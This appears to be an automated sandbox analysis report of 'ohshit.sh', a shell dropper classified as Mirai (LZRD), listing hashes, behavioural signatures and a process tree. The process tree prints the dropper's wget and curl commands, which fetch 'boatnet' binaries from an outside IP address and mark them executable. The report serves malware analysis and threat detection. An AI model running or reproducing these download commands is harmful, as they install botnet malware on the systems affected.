Analysis
-
max time kernel
149s -
max time network
153s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240611-en -
resource tags
arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system -
submitted
09-02-2025 16:28
Static task
static1
Behavioral task
behavioral1
Sample
ohshit.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
ohshit.sh
Resource
debian9-armhf-20240418-en
Behavioral task
behavioral3
Sample
ohshit.sh
Resource
debian9-mipsbe-20240418-en
General
-
Target
ohshit.sh
-
Size
2KB
-
MD5
f0977aee35c9bf421f707b9bfba5d9f7
-
SHA1
5eacb3c68403f8f9c853f41914f27d5abc8645f5
-
SHA256
f3e6052d4142e5a195e03e65d4a8acd2b7d6e790b6aacbc690ae909e7edb01f6
-
SHA512
3184f088b0188b537c6a9ba0aa037c586d3267f17a11d4e6fbb65745b21dafbf37506e359dae372993fb6e28a06e3749b0b5a382901ac805cce83988772f53d9
Malware Config
Extracted
mirai
LZRD
Signatures
-
Mirai family
-
File and Directory Permissions Modification 1 TTPs 6 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 1550 chmod 1558 chmod 1771 chmod 1485 chmod 1501 chmod 1542 chmod -
Executes dropped EXE 6 IoCs
ioc pid Process /tmp/WTF 1486 ohshit.sh /tmp/WTF 1502 ohshit.sh /tmp/WTF 1543 ohshit.sh /tmp/WTF 1551 ohshit.sh /tmp/WTF 1559 ohshit.sh /tmp/WTF 1772 ohshit.sh -
Modifies Watchdog functionality 1 TTPs 2 IoCs
Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
description ioc Process File opened for modification /dev/watchdog ohshit.sh File opened for modification /dev/misc/watchdog ohshit.sh -
Unexpected DNS network traffic destination 5 IoCs
Network traffic to other servers than the configured DNS servers was detected on the DNS port.
description ioc Destination IP 50.7.22.222 Destination IP 50.7.22.222 Destination IP 50.7.22.222 Destination IP 50.7.22.222 Destination IP 50.7.22.222 -
Enumerates running processes
Discovers information about currently running processes on the system
-
Writes file to system bin folder 2 IoCs
description ioc Process File opened for modification /sbin/watchdog ohshit.sh File opened for modification /bin/watchdog ohshit.sh -
resource yara_rule behavioral1/files/fstream-1.dat upx -
description ioc Process File opened for reading /proc/1150/cmdline ohshit.sh File opened for reading /proc/1552/cmdline ohshit.sh File opened for reading /proc/1590/cmdline ohshit.sh File opened for reading /proc/1648/cmdline ohshit.sh File opened for reading /proc/477/cmdline ohshit.sh File opened for reading /proc/1135/cmdline ohshit.sh File opened for reading /proc/1503/cmdline ohshit.sh File opened for reading /proc/1544/cmdline ohshit.sh File opened for reading /proc/447/cmdline ohshit.sh File opened for reading /proc/514/cmdline ohshit.sh File opened for reading /proc/701/cmdline ohshit.sh File opened for reading /proc/1179/cmdline ohshit.sh File opened for reading /proc/1275/cmdline ohshit.sh File opened for reading /proc/1361/cmdline ohshit.sh File opened for reading /proc/1505/cmdline ohshit.sh File opened for reading /proc/1642/cmdline ohshit.sh File opened for reading /proc/641/cmdline ohshit.sh File opened for reading /proc/1051/cmdline ohshit.sh File opened for reading /proc/1109/cmdline ohshit.sh File opened for reading /proc/1254/cmdline ohshit.sh File opened for reading /proc/1291/cmdline ohshit.sh File opened for reading /proc/1584/cmdline ohshit.sh File opened for reading /proc/1585/cmdline ohshit.sh File opened for reading /proc/1594/cmdline ohshit.sh File opened for reading /proc/457/cmdline ohshit.sh File opened for reading /proc/667/cmdline ohshit.sh File opened for reading /proc/440/cmdline ohshit.sh File opened for reading /proc/1149/cmdline ohshit.sh File opened for reading /proc/1506/cmdline ohshit.sh File opened for reading /proc/1582/cmdline ohshit.sh File opened for reading /proc/1654/cmdline ohshit.sh File opened for reading /proc/1666/cmdline ohshit.sh File opened for reading /proc/999/cmdline ohshit.sh File opened for reading /proc/1117/cmdline ohshit.sh File opened for reading /proc/1125/cmdline ohshit.sh File opened for reading /proc/1274/cmdline ohshit.sh File opened for reading /proc/1546/cmdline ohshit.sh File opened for reading /proc/1600/cmdline ohshit.sh File opened for reading /proc/456/cmdline ohshit.sh File opened for reading /proc/625/cmdline ohshit.sh File opened for reading /proc/1113/cmdline ohshit.sh File opened for reading /proc/1528/cmdline ohshit.sh File opened for reading /proc/1732/cmdline ohshit.sh File opened for reading /proc/955/cmdline ohshit.sh File opened for reading /proc/1182/cmdline ohshit.sh File opened for reading /proc/1307/cmdline ohshit.sh File opened for reading /proc/1238/cmdline ohshit.sh File opened for reading /proc/1457/cmdline ohshit.sh File opened for reading /proc/593/cmdline ohshit.sh File opened for reading /proc/658/cmdline ohshit.sh File opened for reading /proc/412/cmdline ohshit.sh File opened for reading /proc/438/cmdline ohshit.sh File opened for reading /proc/474/cmdline ohshit.sh File opened for reading /proc/643/cmdline ohshit.sh File opened for reading /proc/1008/cmdline ohshit.sh File opened for reading /proc/1170/cmdline ohshit.sh File opened for reading /proc/1174/cmdline ohshit.sh File opened for reading /proc/1321/cmdline ohshit.sh File opened for reading /proc/1474/cmdline ohshit.sh File opened for reading /proc/1489/cmdline ohshit.sh File opened for reading /proc/1560/cmdline ohshit.sh File opened for reading /proc/1624/cmdline ohshit.sh File opened for reading /proc/454/cmdline ohshit.sh File opened for reading /proc/1130/cmdline ohshit.sh -
System Network Configuration Discovery 1 TTPs 2 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 1490 wget 1491 curl -
Writes file to tmp directory 13 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/boatnet.x86_64 wget File opened for modification /tmp/boatnet.x86_64 curl File opened for modification /tmp/boatnet.mpsl wget File opened for modification /tmp/boatnet.mpsl curl File opened for modification /tmp/boatnet.x86 curl File opened for modification /tmp/boatnet.arc wget File opened for modification /tmp/boatnet.i686 curl File opened for modification /tmp/boatnet.mips curl File opened for modification /tmp/boatnet.arc curl File opened for modification /tmp/boatnet.i468 curl File opened for modification /tmp/boatnet.x86 wget File opened for modification /tmp/WTF ohshit.sh File opened for modification /tmp/boatnet.mips wget
Processes
-
/tmp/ohshit.sh/tmp/ohshit.sh1⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
- Writes file to tmp directory
PID:1478 -
/usr/bin/wgetwget http://194.85.251.9/hiddenbin/boatnet.x862⤵
- Writes file to tmp directory
PID:1479
-
-
/usr/bin/curlcurl -O http://194.85.251.9/hiddenbin/boatnet.x862⤵
- Writes file to tmp directory
PID:1483
-
-
/bin/catcat boatnet.x862⤵PID:1484
-
-
/bin/chmodchmod +x boatnet.x86 config-err-wyp2Uv netplan_gsm552c4 ohshit.sh snap-private-tmp ssh-zLJyRkZwfWgF systemd-private-ab3d93cdee204eac989d9d97b6faf745-bolt.service-pXNYLF systemd-private-ab3d93cdee204eac989d9d97b6faf745-colord.service-dMsLxG systemd-private-ab3d93cdee204eac989d9d97b6faf745-ModemManager.service-XU1dQA systemd-private-ab3d93cdee204eac989d9d97b6faf745-systemd-resolved.service-xYf2P0 systemd-private-ab3d93cdee204eac989d9d97b6faf745-systemd-timedated.service-TlyAal WTF2⤵
- File and Directory Permissions Modification
PID:1485
-
-
/usr/bin/wgetwget http://194.85.251.9/hiddenbin/boatnet.mips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1490
-
-
/usr/bin/curlcurl -O http://194.85.251.9/hiddenbin/boatnet.mips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1491
-
-
/bin/chmodchmod +x boatnet.mips boatnet.x86 config-err-wyp2Uv netplan_gsm552c4 ohshit.sh snap-private-tmp ssh-zLJyRkZwfWgF systemd-private-ab3d93cdee204eac989d9d97b6faf745-bolt.service-pXNYLF systemd-private-ab3d93cdee204eac989d9d97b6faf745-colord.service-dMsLxG systemd-private-ab3d93cdee204eac989d9d97b6faf745-ModemManager.service-XU1dQA systemd-private-ab3d93cdee204eac989d9d97b6faf745-systemd-resolved.service-xYf2P0 systemd-private-ab3d93cdee204eac989d9d97b6faf745-systemd-timedated.service-TlyAal WTF2⤵
- File and Directory Permissions Modification
PID:1501
-
-
/usr/bin/wgetwget http://194.85.251.9/hiddenbin/boatnet.arc2⤵
- Writes file to tmp directory
PID:1506
-
-
/usr/bin/curlcurl -O http://194.85.251.9/hiddenbin/boatnet.arc2⤵
- Writes file to tmp directory
PID:1534
-
-
/bin/chmodchmod +x boatnet.arc boatnet.mips boatnet.x86 config-err-wyp2Uv netplan_gsm552c4 ohshit.sh snap-private-tmp ssh-zLJyRkZwfWgF systemd-private-ab3d93cdee204eac989d9d97b6faf745-bolt.service-3bfHF4 systemd-private-ab3d93cdee204eac989d9d97b6faf745-colord.service-dMsLxG systemd-private-ab3d93cdee204eac989d9d97b6faf745-ModemManager.service-XU1dQA systemd-private-ab3d93cdee204eac989d9d97b6faf745-systemd-resolved.service-xYf2P0 WTF2⤵
- File and Directory Permissions Modification
PID:1542
-
-
/usr/bin/wgetwget http://194.85.251.9/hiddenbin/boatnet.i4682⤵PID:1547
-
-
/usr/bin/curlcurl -O http://194.85.251.9/hiddenbin/boatnet.i4682⤵
- Writes file to tmp directory
PID:1548
-
-
/bin/chmodchmod +x boatnet.arc boatnet.i468 boatnet.mips boatnet.x86 config-err-wyp2Uv netplan_gsm552c4 ohshit.sh snap-private-tmp ssh-zLJyRkZwfWgF systemd-private-ab3d93cdee204eac989d9d97b6faf745-bolt.service-3bfHF4 systemd-private-ab3d93cdee204eac989d9d97b6faf745-colord.service-dMsLxG systemd-private-ab3d93cdee204eac989d9d97b6faf745-ModemManager.service-XU1dQA systemd-private-ab3d93cdee204eac989d9d97b6faf745-systemd-resolved.service-xYf2P0 WTF2⤵
- File and Directory Permissions Modification
PID:1550
-
-
/usr/bin/wgetwget http://194.85.251.9/hiddenbin/boatnet.i6862⤵PID:1555
-
-
/usr/bin/curlcurl -O http://194.85.251.9/hiddenbin/boatnet.i6862⤵
- Writes file to tmp directory
PID:1556
-
-
/bin/chmodchmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.x86 config-err-wyp2Uv netplan_gsm552c4 ohshit.sh snap-private-tmp ssh-zLJyRkZwfWgF systemd-private-ab3d93cdee204eac989d9d97b6faf745-bolt.service-3bfHF4 systemd-private-ab3d93cdee204eac989d9d97b6faf745-colord.service-dMsLxG systemd-private-ab3d93cdee204eac989d9d97b6faf745-ModemManager.service-XU1dQA systemd-private-ab3d93cdee204eac989d9d97b6faf745-systemd-resolved.service-xYf2P0 WTF2⤵
- File and Directory Permissions Modification
PID:1558
-
-
/usr/bin/wgetwget http://194.85.251.9/hiddenbin/boatnet.x86_642⤵
- Writes file to tmp directory
PID:1563
-
-
/usr/bin/curlcurl -O http://194.85.251.9/hiddenbin/boatnet.x86_642⤵
- Writes file to tmp directory
PID:1763
-
-
/bin/chmodchmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.x86 boatnet.x86_64 config-err-wyp2Uv netplan_gsm552c4 ohshit.sh snap-private-tmp ssh-zLJyRkZwfWgF systemd-private-ab3d93cdee204eac989d9d97b6faf745-bolt.service-xQi3aU systemd-private-ab3d93cdee204eac989d9d97b6faf745-colord.service-dMsLxG systemd-private-ab3d93cdee204eac989d9d97b6faf745-ModemManager.service-XU1dQA systemd-private-ab3d93cdee204eac989d9d97b6faf745-systemd-resolved.service-xYf2P0 WTF2⤵
- File and Directory Permissions Modification
PID:1771
-
-
/usr/bin/wgetwget http://194.85.251.9/hiddenbin/boatnet.mpsl2⤵
- Writes file to tmp directory
PID:1776
-
-
/usr/bin/curlcurl -O http://194.85.251.9/hiddenbin/boatnet.mpsl2⤵
- Writes file to tmp directory
PID:1777
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
29KB
MD58231c76be6663e62d7d5a8ea685ff498
SHA103177493e6a6d9e3b7aaca572245065ffcfe0575
SHA256c45cbd5ce92e34f62bd3e1e19c36daf662860aac2a22a5d67924788acc71e3bc
SHA5121a8eb5eaf84d38252f4535a2a89aca76fadf7854d218c6bca7ec2521ee485d9bd082e3eeff4ec981abaf0e18afc0eed7415ae656d3080b152fb7b35370caa9ac